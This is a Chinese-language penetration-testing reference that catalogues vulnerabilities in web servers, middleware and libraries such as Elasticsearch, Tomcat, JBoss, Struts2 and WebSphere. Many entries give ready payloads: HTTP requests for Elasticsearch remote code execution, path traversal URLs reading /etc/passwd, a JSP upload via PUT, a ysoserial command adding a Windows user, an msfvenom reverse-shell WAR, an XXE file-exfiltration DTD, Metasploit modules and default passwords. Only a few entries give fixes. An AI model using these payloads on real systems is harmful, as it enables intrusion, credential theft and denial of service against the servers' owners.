  • http://[ip]:9200/_nodes 查看节点数据
  • http://[ip]:9200/_cat/indices?v 查看当前节点的所有 Index
  • http://[ip]:9200/_search?pretty=true 查询所有的 index, type
  • Elasticvue - 进行未授权访问漏洞利用的插件

CVE-2014-3120 ElasticSearch 命令执行漏洞

  • 描述

    老版本 ElasticSearch 支持传入动态脚本 (MVEL) 来执行一些复杂的操作,而 MVEL 可执行 Java 代码,而且没有沙盒,所以我们可以直接执行任意代码.

  • 影响版本

    • ElasticSearch 1.1.1
  • POC | Payload | exp

    来源: ElasticSearch 命令执行漏洞 (CVE-2014-3120) 测试环境

    首先,该漏洞需要 es 中至少存在一条数据,所以我们需要先创建一条数据:

    POST /website/blog/ HTTP/1.1
    Host: your-ip:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 25
    
    {
    "name": "test"
    }
    

    然后,执行任意代码:

    POST /_search?pretty HTTP/1.1
    Host: your-ip:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 343
    
    {
        "size": 1,
        "query": {
        "filtered": {
            "query": {
            "match_all": {
            }
            }
        }
        },
        "script_fields": {
            "command": {
                "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
            }
        }
    }
    

CVE-2015-1427 Groovy 沙盒绕过 && 代码执行漏洞

  • 描述

    CVE-2014-3120 后,ElasticSearch 默认的动态脚本语言换成了 Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。

  • 影响版本

    • ElasticSearch < 1 .3.7
    • ElasticSearch 1.4.0 ~ 1.4.2
  • 相关文章

  • POC | Payload | exp

    来源: ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 (CVE-2015-1427) 测试环境

    由于查询时至少要求 es 中有一条数据,所以发送如下数据包,增加一个数据:

    POST /website/blog/ HTTP/1.1
    Host: your-ip:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 25
    
    {
    "name": "test"
    }
    

    然后发送包含 payload 的数据包,执行任意命令:

    POST /_search?pretty HTTP/1.1
    Host: your-ip:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/text
    Content-Length: 156
    
    {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
    

CVE-2015-3337 目录穿越漏洞

  • 描述

    在安装了具有"site"功能的插件以后,插件目录使用 ../ 即可向上跳转,导致目录穿越漏洞,可读取任意文件.没有安装任意插件的 elasticsearch 不受影响.

  • 影响版本

    • ElasticSearch < 1.4.4
    • ElasticSearch 1.5.0 ~ 1.5.1
  • POC | Payload | exp

    来源: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/

    • http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd (不要在浏览器访问)

    • http://your-ip:9200/_plugin/head/

CVE-2015-5531

  • 描述

    elasticsearch 1.5.1 及以前,无需任何配置即可触发该漏洞.之后的新版,配置文件 elasticsearch.yml 中必须存在 path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置.不配置该值,默认不启动这个功能.

  • 影响版本

    • ElasticSearch < 1.6.0
  • 相关文章

  • POC | Payload | exp

    来源: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/

    新建一个仓库

    PUT /_snapshot/test HTTP/1.1
    Host: your-ip:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 108
    
    {
        "type": "fs",
        "settings": {
            "location": "/usr/share/elasticsearch/repo/test"
        }
    }
    

    创建一个快照

    PUT /_snapshot/test2 HTTP/1.1
    Host: your-ip:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 108
    
    {
        "type": "fs",
        "settings": {
            "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
        }
    }
    

    目录穿越读取任意文件

    http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

    在错误信息中包含文件内容 (编码后) ,对其进行解码即可获得文件

log4j 影响


官网 : https://flink.apache.org/

Fofa: app="APACHE-Flink"

CVE-2020-17518 文件写入

CVE-2020-17519 文件读取


httpd

CVE-2007-6750 Apache ddos

  • 描述

    Apache HTTP Server 1.x版本和2.x版本中存在资源管理错误漏洞。该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。

  • MSF Module

    use auxiliary/dos/http/slowloris
    set RHOST <rhost>
    run
    

CVE-2017-15715 Apache 解析漏洞

SSI 远程命令执行漏洞

CVE-2019-0211 Apache HTTP 服务组件提权漏洞

CVE-2021-40438

CVE-2021-41773 Apache HTTP Server 路径穿越漏洞

CVE-2021-42013 Apache任意文件读取补丁绕过


IIS

相关文章

IIS shortname

.Net Framework 拒绝服务攻击

  • 描述

    当请求文件夹名称包含 ~1 的请求,会导致不存在该文件的 .Net Framework 去递归查询所有根目录.如果只有一个"1"是无效的,当"1"大于一个,比如像这样:

    /wwwtest/fuck~1/~1/~1/~1.aspx

    此时文件系统会这样调用:

    \wwwtest                           SUCCESS
    \wwwtest\fuck~1\~1\~1\~1           PATH NOT FOUND
    \wwwtest\fuck~1                    NAME NOT FOUND
    \wwwtest\fuck~1\~1\                PATH NOT FOUND
    \wwwtest\fuck~1\~1\~1\             PATH NOT FOUND
    \wwwtest\fuck~1\~1\~1\~1.aspx      PATH NOT FOUND
    \wwwtest\fuck~1\~1\~1\~1.aspx      PATH NOT FOUND
    \wwwtest\fuck~1\~1\~1              PATH NOT FOUND
    \wwwtest\fuck~1\~1\~1\~1.aspx      PATH NOT FOUND
    \wwwtest\fuck~1\~1\~1              PATH NOT FOUND
    \wwwtest\fuck~1\~1                 PATH NOT FOUND
    \wwwtest\fuck~1                    NAME NOT FOUND
    \wwwtest                           SUCCESS
    \wwwtest                           SUCCESS
    

    如果我们请求的文件/文件夹名同时存在大小写时,这个请求会被请求两次,一次是原封不动的请求,一次是全部使用小写的请求.

    下表显示了每个请求的 FS 调用的数量(Windows 2008 R2, IIS 7.5(latest patch - June 2012), and .Net framework 4.0.30319 (在别的系统下可能会不同))

CVE-2017-7269 IIS6.0 RCE


JBOSS

官网 : http://www.jboss.org/

相关文章

相关工具

目录结构

home 文件夹

  • bin:该目录包含所有入口点 Java 包 (Java Archives, JAR) 和脚本, 包括启动和关闭。
  • client:该目录存储可能由外部 Java 客户端应用使用的配置文件。
  • commion:该目录包含所有服务端的通用 JAR 包及配置文件。
  • docs:该目录包含 JBoss 文档及模式 (schema), 它们在开发过程中非常有用。
  • lib:该目录包含 JBoss 启动所需的所有 JAR 包。
  • server:该目录包含与不同服务器配置相关的文件, 包括正式环境和测试环境。

/server/default 文件夹

  • conf:该目录包含配置文件, 包括 1ogin-config 及 bootstrap config。
  • data:该目录可用于在文件系统中存储内容的服务。
  • deploy:该目录包含部署在服务器上的 WAR 文件。
  • lib:该目录是启动时把静态 Java 类库加载到共享类路径的默认位置。
  • Log:该目录是所有日志写入的目录。
  • tmp:JBoss 使用该目录存储临时文件。
  • work:该目录包含编译后的 JSP 和类文件。

/server/default/deploy 文件夹

  • admin-console.war:是 JBoss AS 的管理控制台
  • ROOT. war:根 (/root) Web 应用程序。
  • jbossweb.sar:服务器上部署的 Tomcat Servlet 引擎。
  • jbossws.sar:支持 Web 服务的 JBoss 服务。

未授权访问漏洞

  • 描述

    部分版本 JBoss 默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。

    • http://[ip]:8080/jmx-console

CVE-2016-7065 Red Hat JBoss EAP - Deserialization of Untrusted Data

  • 描述

    JBoss 企业应用程序平台(EAP)4和5中的 JMX servlet 允许远程 DOS,并可能通过精心设计的序列化 Java 对象执行任意代码。

  • 影响版本

    • JBOSS 4.0.0
    • JBOSS 5.0.0
  • POC | Payload | exp

CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞

  • 描述

    JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

  • POC | Payload | exp

CVE-2017-12149 JBoss 5.x/6.x 反序列化漏洞

JMXInvokerServlet 反序列化漏洞


Jetty

CVE-2021-28164 && CVE-2021-28169


Nacos

FOFA: title="Nacos"

CVE-2021-29441 && CVE-2021-29442 nacos v1.x authentication bypass

Nacos Client Yaml反序列化


Resin

官网 : https://caucho.com/

相关文章

Resin 任意文件读取漏洞

Resin 文件解析漏洞


Nginx

CVE-2021-23017


RabbitMQ

Fofa: app="RabbitMQ"

默认口令

guest
guest

RocketMQ

Tips

  • 4.0.x ~ 4.3.x 存在 fastjson 1.2.29

Shiro


Solr

官网 : https://lucene.apache.org/solr/

Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理.

Solr 的漏洞情报参考 https://issues.apache.org/jira/projects/SOLR/issues

资源

CVE-2017-12629 Apache solr XML 实体注入漏洞

  • 描述

    原理大致是文档通过 Http 利用 XML 加到一个搜索集合中.查询该集合也是通过 http 收到一个 XML/JSON 响应来实现.此次 7.1.0 之前版本总共爆出两个漏洞:XML 实体扩展漏洞 (XXE) 和远程命令执行漏洞 (RCE) ,二者可以连接成利用链,编号均为 CVE-2017-12629.

  • 影响版本

    • Apache solr 5.5.0 ~ 5.5.4
    • Apache solr 6.0.0 ~ 6.6.1
    • Apache solr 7.0.0 ~ 7.0.1
  • 相关文章

CVE-2019-0192 Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5

CVE-2019-0193 Apache Solr 远程命令执行漏洞

CVE-2019-12409

CVE-2019-17558 Apache Solr Velocity 模版注入远程命令执行漏洞

CVE-2020-13957 Apche Solr 未授权上传

Apache Solr =< 8.8.1 任意文件读取漏洞

Apache Solr<= 8.8.2 任意文件删除

CVE-2021-27905 ssrf


Spring


Struts2

官网 : https://struts.apache.org/

fofa: app="Struts2"

Struts2 的漏洞情报参考 https://cwiki.apache.org/confluence/display/WW/Security+Bulletins

指纹

  • Struts
  • .action
  • .do
  • .action!xxxx
  • .c

相关工具

环境搭建

相关文章

S2-016 & CVE-2013-2251

  • https://cwiki.apache.org/confluence/display/WW/S2-016

  • 描述

    DefaultActionMapper 类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟 OGNL 表达式,由于 struts2 没有对这些前缀做过滤,导致利用 OGNL 表达式调用 java 静态方法执行任意系统命令

  • 影响版本

    • Struts 2.0.0 ~ 2.3.15
  • POC | Payload | exp

S2-020 & CVE-2014-0094 & CNNVD-201403-191

S2-045 & CVE-2017-5638

S2-046 & CVE-2017-5638

  • https://cwiki.apache.org/confluence/display/WW/S2-046

  • 描述

    该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过修改 HTTP 请求头中的 Content-Type 值,构造发送恶意的数据包,利用该漏洞进而在受影响服务器上执行任意系统命令.

  • 影响版本

    • Struts 2.3.5 ~ 2.3.31
    • Struts 2.5 ~ 2.5.10
  • 修复方案

    1. 官方已经发布版本更新,尽快升级到不受影响的版本(Struts 2.3.32 或 Struts 2.5.10.1),建议在升级前做好数据备份.
    2. 临时修复方案
      在用户不便进行升级的情况下,作为临时的解决方案,用户可以进行以下操作来规避风险:在 WEB-INF/classes 目录下的 struts.xml 中的 struts 标签下添加
      <constant name="struts.custom.i18n.resources" value="global" />
      在 WEB-INF/classes/ 目录下添加 global.properties,文件内容如下:
      struts.messages.upload.error.InvalidContentTypeException=1
  • POC | Payload | exp

S2-048 & CVE-2017-9791

S2-052 & CVE-2017-9805

S2-053 & CVE-2017-12611

  • https://cwiki.apache.org/confluence/display/WW/S2-053

  • 描述

    当开发者在 Freemarker 标签中使用如下代码时 <@s.hidden name=”redirectUri” value=redirectUri /><@s.hidden name=”redirectUri” value=”${redirectUri}” /> Freemarker 会将值当做表达式进行执行,最后导致代码执行。

  • 影响版本

    • Struts 2.0.0 ~ 2.3.33
    • Struts 2.5 ~ 2.5.10.1
  • POC | Payload | exp

S2-055 & CVE-2017-7525

  • https://cwiki.apache.org/confluence/display/WW/S2-055

  • 描述

    2017年12月1日,Apache Struts 发布最新的安全公告,Apache Struts 2.5.x REST 插件存在远程代码执行的中危漏洞,漏洞编号与 CVE-2017-7525 相关。漏洞的成因是由于使用的 Jackson 版本过低在进行 JSON 反序列化的时候没有任何类型过滤导致远程代码执行。。

  • 影响版本

    • Struts 2.5 ~ 2.5.14
  • POC | Payload | exp

S2-056 & CVE-2018-1327

  • https://cwiki.apache.org/confluence/display/WW/S2-056

  • 描述

    S2-056 漏洞发生于 Apache Struts 2的 REST 插件,当使用 XStream 组件对 XML 格式的数据包进行反序列化操作,且未对数据内容进行有效验证时,攻击者可通过提交恶意 XML 数据对应用进行远程 DoS 攻击。

  • 影响版本

    • Struts 2.1.1 ~ 2.5.14.1
  • POC | Payload | exp

S2-057 & CVE-2018-11776

S2-059 & CVE-2019-0230

S2-061 & CVE-2020-17530


Tapestry

CVE-2021-27850


Tomcat

官网 : https://tomcat.apache.org/

Tomcat 默认端口为 8080,也可能被改为其他端口,后台管理路径为 /manager/html,后台默认弱口令 admin/admin、tomcat/tomcat 等,若果配置不当,可通过"Tomcat Manager"连接部署 war 包的方式获取 webshell.

搭建教程

相关文章

Tips

  • tomcat5 默认有两个角色:tomcat 和 role1。其中账号 both、tomcat、role1 的默认密码都是 tomcat。不过不具备部署应用的权限,默认需要 manager 权限才能够直接部署 war 包.
  • tomcat6 默认没有配置任何用户以及角色,没办法用默认账号登录.
  • tomcat7 与6类似
  • tomcat8 其实从6开始,tomcat 就将默认的用户去掉了
  • 控制台路径
    • /manager/status
    • /manager/html
    • /host-manager/
  • jar -cf job.war ./job.jsp 生成 war 包
  • 如果应用存在 lfi,可以配合以下几点进一步挖掘信息:

爆破 Manager APP

Manager 管理平台我们都很熟悉,也是最常见的,包含多个管理模块,开启后方便开发及运维人员对 tomcat 项目发布进行管理。Manager 管理平台默认安装后是没有设置登录口令的,需要在 tomcat-user.xml 文件中进行配置,与上文的 admin 管理平台相同。

在登录 manager 后台时,tomcat 使用的是 Basic 认证方式,在请求的数据包中包含一个 Authorization 字段,该字段的值为账号密码的 base64 编码,口令形式为 username:password

Tomcat manager 包含 4 个不同的角色:

  • manager-gui:允许访问 html 页面接口 (即 URL 路径为 / manager/html/*)
  • manager-script:允许访问纯文本接口 (即 URL 路径为 / manager/text/*)
  • manager-jmx:允许访问 JMX 代理接口 (即 URL 路径为 / manager/jmxproxy/*)
  • manager-status:允许访问 Tomcat 只读状态页面 (即 URL 路径为 / manager/status/*)
    其中 manager-gui、manager-script、manager-jmx 三个角色均具备 manager-status 角色的权限,即这三种角色权限无需再额外添加 manager-status 权限。实际使用中只需配置 manager-gui 角色通过 html 页面的形式访问管理平台。

manager-jmx

Tomcat 使用 JMX 管理方式,在 Tomcat 的自带应用 manager 就是使用了 JMX 方式来管理 Tomcat,以此完成 Web 应用的动态部署、启动、停止。在 tomcat 的帮助文档中,提供了下面几种方式发送请求获取相应的信息:

  • query 命令:http://[ip]:[port]/manager/jmxproxy/?qry=
  • get 命令:http:// [ip]:[port]/manager/jmxproxy/?get=
  • set 命令:http:// [ip]:[port]/manager/jmxproxy/?set=
  • invoke 命令:http:// [ip]:[port]/manager/jmxproxy/?invoke=
    访问上面的地址,我们就可以看到不同的信息,通过向不同的参数传递特定的参数,也可以获取到一些敏感信息。不加参数时查询到的是所有的 MBeans 的内容,加参数之后就可以查看到具体的 MBeans 的内容。

例如: http://[ip]:[port]/manager/jmxproxy/?qry=*%3atype=User%2c*

该查询可以看到设置的 tomcat-user.xml 中配置的账号密码,甚至还可以通过 set 命令修改账号密码,来设置一个后门账号。

War

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file

样例目录 session 操纵漏洞

Tomcat 在安装部署后,在 webapps 默认存在一个 examples 目录,该目录正如其文件名一样,提供一些示例应用让使用者来了解 Tomcat 的特性及功能。这些样例在业务上线后并没有什么用处,建议部署 tomcat 后,删除其中的样例文件(ROOT, balancer,jsp-examples, servlet-examples, tomcat-docs, webdav),避免信息泄露和其他潜在的安全风险。

这些样例中的 session 样例(/examples/servlets/servlet/SessionExample)允许用户对 session 进行操纵,因为 session 是全局通用的,所以用户可以通过操纵 session 获取管理员权限,存在一定的安全风险,不过这种基本上只有在一些比较老的不安全系统中才有可能出现,利用条件比较苛刻。

CVE-2016-1240

CVE-2016-8735

  • 描述

    Oracle 修复了 JmxRemoteLifecycleListener 反序列化漏洞(CVE-2016-3427)。 Tomcat 也使用了 JmxRemoteLifecycleListener 这个监听器,但是 Tomcat 并没有及时升级,存在这个远程代码执行漏洞。

  • 漏洞利用条件

    外部需要开启 JmxRemoteLifecycleListener 监听的 10001 和 10002 端口来实现远程代码执行。

  • 影响版本

    • Tomcat 9.0.0.M1 ~ 9.0.0.M11
    • Tomcat 8.5.0 ~ 8.5.6
    • Tomcat 8.0.0.RC1 ~ 8.0.38
    • Tomcat 7.0.0 ~ 7.0.72
    • Tomcat 6.0.0 ~ 6.0.47
  • 相关文章

  • POC | Payload | exp

    java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 192.168.48.211 10001 Groovy1 "C:\Windows\System32\net.exe user  test 12345 /add "
    

CVE-2017-12615/12616

  • 描述

    2017年9月19日,Apache Tomcat 官方确认并修复了两个高危漏洞,漏洞 CVE 编号:CVE-2017-12615 和 CVE-2017-12616,该漏洞受影响版本为7.0.0-7.0.80之间,官方评级为高危,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险.

    • CVE-2017-12615:远程代码执行漏洞

      当 Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法 (例如,将 readonly 初始化参数由默认值设置为 false) ,攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行.导致服务器上的数据泄露或获取服务器权限.

    • CVE-2017-12616:信息泄露漏洞

      当 Tomcat 中启用了 VirtualDirContext 时,攻击者将能通过发送精心构造的恶意请求,绕过设置的相关安全限制,或是获取到由 VirtualDirContext 提供支持资源服务的 JSP 源代码,从而造成代码信息泄露.

  • 漏洞利用条件

    • CVE-2017-12615 漏洞利用需要在 Windows 环境,且需要将 readonly 初始化参数由默认值设置为 false,经过实际测试,Tomcat 7.x 版本内 web.xml 配置文件内默认配置无 readonly 参数,需要手工添加,默认配置条件下不受此漏洞影响.

    • CVE-2017-12616 漏洞需要在 server.xml 文件配置 VirtualDirContext 参数,经过实际测试,Tomcat 7.x 版本内默认配置无 VirtualDirContext 参数,需要手工添加,默认配置条件下不受此漏洞影响.

  • 影响版本

    • CVE-2017-12615 影响版本 : Apache Tomcat 7.0.0 ~ 7.0.79 (windows 环境)
    • CVE-2017-12616 影响版本 : Apache Tomcat 7.0.0 ~ 7.0.80
  • 相关文章

  • POC | Payload | exp

    PUT /1.jsp/ HTTP/1.1
    Host: your-ip:8080
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 5
    
    <% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>
    

CVE-2017-12617

  • 描述

    运行启用了 HTTP PUT 的 Apache Tomcat 特定版本时(例如,通过将默认 servlet 的只读初始化参数设置为 false)可以通过特制请求将 JSP 文件上载到服务器。然后可以请求此 JSP,并且服务器将执行其中包含的所有代码。

  • 影响版本

    • Apache Tomcat 7.0.0 ~ 7.0.81
    • Apache Tomcat 8.0.0 ~ 8.0.17
  • 相关文章

  • POC | Payload | exp

  • MSF Module

    use exploit/multi/http/tomcat_jsp_upload_bypass
    

CVE-2018-11784 Tomcat URL跳转漏洞

  • 描述

    当 Apache Tomcat 版本 9.0.0.M1 到 9.0.11、8.5.0 到 8.5.33 和 7.0.23 到 7.0.90 中的默认 servlet 返回到一个目录的重定向(例如,当用户请求'/foo'时重定向到'/foo/’),一个特制的 URL 可用于导致重定向生成到攻击者选择的任何 URI。

  • 影响版本

    • Apache Tomcat 9.0.0.M1 ~ 9.0.11
    • Apache Tomcat 8.5.0 ~ 8.5.33
    • Apache Tomcat 7.0.23 ~ 7.0.90
  • 相关文章

  • POC | Payload | exp

    http://[ip:port]//[baidu.com]/..;/[可访问目录/可访问目录]
    

    默认存在的 docs 目录也可以被利用,例

    http://[ip:port]//[baidu.com]/..;/docs/images
    

CVE-2019-0232

CVE-2020-1938 && CNVD-2020-10487 Apache Tomcat Ghostcat 漏洞

  • 描述

    Apache Tomcat 会开启 AJP 连接器,方便与其他 Web 服务器通过 AJP 协议进行交互。由于 Tomcat 本身也内含了 HTTP 服务器,因此也可以视作单独的 Web 服务器。

    但 Apache Tomcat在 AJP 协议的实现上存在漏洞,导致攻击者可以通过发送恶意的 AJP 请求,可以读取或者包含 Web 应用根目录下的任意文件,如果配合文件上传任意格式文件,将可能导致任意代码执行(RCE).该漏洞利用 AJP 服务端口实现攻击,未开启 AJP 服务对外不受漏洞影响(tomcat 默认将 AJP 服务开启并绑定至 0.0.0.0/0)。

    此漏洞为文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。

  • 影响版本

    • Apache Tomcat = 6
    • 7 <= Apache Tomcat < 7.0.100
    • 8 <= Apache Tomcat < 8.5.51
    • 9 <= Apache Tomcat < 9.0.31
  • 相关文章

  • POC | Payload | exp

  • 修复建议

    • 请尽快更新 Tomcat 到安全版本。
    • 临时禁用 AJP 协议端口,打开 Tomcat 配置文件 <CATALINA_BASE>/conf/service.xml,注释掉如下行:
      <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
      
      修改完后,重启 tomcat 即可。
    • 除以上措施外,也可采用防火墙等方法阻止不可信任的来源访问 Tomcat AJP Connector 端口。

tomcat cluster sync-session

  • 描述

    tomcat 使用了自带 session 同步功能时,不安全的配置(没有使用 EncryptInterceptor)导致存在的反序列化漏洞,通过精心构造的数据包,可以对使用了 tomcat 自带 session 同步功能的服务器进行攻击。

  • POC | Payload | exp

CVE-2020-9484 Session 反序列化代码执行漏洞

CVE-2020-13935

  • 描述

    Apache Tomcat 中的 WebSocket 存在安全漏洞,该漏洞源于程序没有正确验证 payload 的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。

  • 影响版本

    • Apache Tomcat 10.0.0-M1-10.0.0-M6
    • Apache Tomcat 9.0.0.M1-9.0.36
    • Apache Tomcat 8.5.0-8.5.56
    • Apache Tomcat 7.0.27-7.0.104
  • 相关文章

  • POC | Payload | exp


uWSGI

uWSGI 未授权访问漏洞


Weblogic


Websphere

CVE-2014-0910

CVE-2015-7450

CVE-2019-4279 Websphere ND远程命令执行

CVE-2020-4643 WebSphere XXE 漏洞

  • 相关文章

  • POC | Payload | exp

    xml如下:
    <!DOCTYPE x [
    <!ENTITY % aaa SYSTEM "file:///C:/Windows/win.ini">
    <!ENTITY % bbb SYSTEM "http://yourip:8000/xx.dtd">
    %bbb;
    ]>
    <definitions name="HelloService" xmlns="http://schemas.xmlsoap.org/wsdl/">
    &ddd;
    </definitions>
    
    xx.dtd如下:
    <!ENTITY % ccc '<!ENTITY ddd '<import namespace="uri" location="http://yourip:8000/xxeLog?%aaa;"/>'>'>%ccc;
    

Websphere Portal ssrf


组件

编辑器

手册

ewebeditor

官网 : http://www.ewebeditor.net/

相关文章

常用路径

Admin_Login.asp
Admin_Default.asp
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp
db/ewebeditor.mdb
ewebeditor/login_admin.asp
eweb/login_admin.asp
editor/login_admin.asp

FCKeditor

官网 : https://ckeditor.com/

相关文章

常用路径

FCKeditor/_samples/default.html
FCKeditor/_whatsnew.html
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.test.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp

.net 目录遍历

/FCkeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=

kindeditor

官网 : http://kindeditor.net/

kindeditor<=4.1.5 上传漏洞


ueditor

相关文章
- 百度Ueditor编辑器漏洞总结

ueditor ssrf

CNVD-2017-20077 ueditor 上传漏洞


序列化

相关文章

fastjson

Jackson

FasterXML Jackson 是美国 FasterXML 公司的一款适用于 Java 的数据处理工具。

主要的几个 jar 包:

  • jackson-core : 核心包
  • jackson-annotations : 注解包
  • jackson-databind : 数据绑定包

CVE-2017-7525 Jackson-databind 反序列化漏洞

  • 描述

    Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。

  • 相关文章

CVE-2017-17485 Jackson-databind 反序列化

  • 描述

    FasterXML Jackson 是美国 FasterXML 公司的一款适用于 Java 的数据处理工具。jackson-databind 是其中的一个具有数据绑定功能的组件。

    FasterXML Jackson-databind 2.8.10 及之前版本和 2.9.x 版本至 2.9.3 版本中存在代码问题漏洞。远程攻击者可通过向 ObjectMapper 的 readValue 方法发送恶意制作的 JSON 输入并绕过黑名单利用该漏洞执行代码。

  • 相关文章

CVE-2019-12086

  • 描述

    使用了 jackson-databind 2.x before 2.9.9 的 Java 应用,如果 ClassPath 中有 com.mysql.cj.jdbc.admin.MiniAdmin(存在于 MySQL 的 JDBC 驱动中)这个类,那么 Java 应用所在的服务器上的文件,就可能被任意读取并传送到恶意的MySQL Server。

  • 相关文章

CVE-2019-12384 Jackson-databind RCE And SSRF

  • 描述

    6月21日,Redhat 官方发布 jackson-databind 漏洞(CVE-2019-12384)安全通告,多个 Redhat 产品受此漏洞影响,CVSS 评分为 8.1,漏洞利用复杂度高。7月22日,安全研究员 Andrea Brancaleoni 对此漏洞进行分析,并公布了该漏洞的分析文章。

    该漏洞是由于 Jackson 黑名单过滤不完整而导致,当开发人员在应用程序中通过 ObjectMapper 对象调用 enableDefaultTyping 方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的 json 数据包对应用进行攻击,直接获取服务器控制权限。

  • 影响版本

    • Jackson-databind 2.X < 2.9.9.1
  • 相关文章

  • POC | Payload | exp

CVE-2020-8840 FasterXML/jackson-databind 远程代码执行漏洞

CVE-2020-9547 FasterXML/jackson-databind 远程代码执行漏洞

CVE-2020-9548 FasterXML/jackson-databind 远程代码执行漏洞

CVE-2020-11113 远程代码执行漏洞

CVE-2020-35728

CVE-2020-36179 Jackson-databind SSRF&RCE

Xstream

相关文章

CVE-2020-26217

CVE-2020-26258

CVE-2020-26259 任意文件删除

CVE-2021-29505


JavaScript库

jQuery

检测工具

CVE-2020-11022/11023 jQuery XSS漏洞

CVE-2018-9206 jQuery-File-Upload 未授权任意文件上传漏洞

KaTeX

xss


其他

AjaxPro.NET

CVE-2021-23758 AjaxPro.NET反序列化漏洞

exiftool

CVE-2021-22204

Ghostscript

CVE-2019-6116 沙箱绕过(命令执行)漏洞

GhostScript-9.50 RCE

ImageMagick

CVE-2016-3714

Log4j

PrimeFaces

CVE-2017-1000486

webuploader

项目地址 : https://github.com/fex-team/webuploader

webuploader-v-0.1.15 组件存在文件上传漏洞(未授权)

dompdf

dompdf-rce


服务

相关文章

Adminer

Adminer≤4.6.2任意文件读取漏洞


ApiSix

CVE-2021-43557 Request Uri目录穿越漏洞

CVE-2021-45232 Apache APISIX Dashboard 认证绕过漏洞


Apollo

项目地址 : https://github.com/apolloconfig/apollo

fofa : icon_hash="11794165"
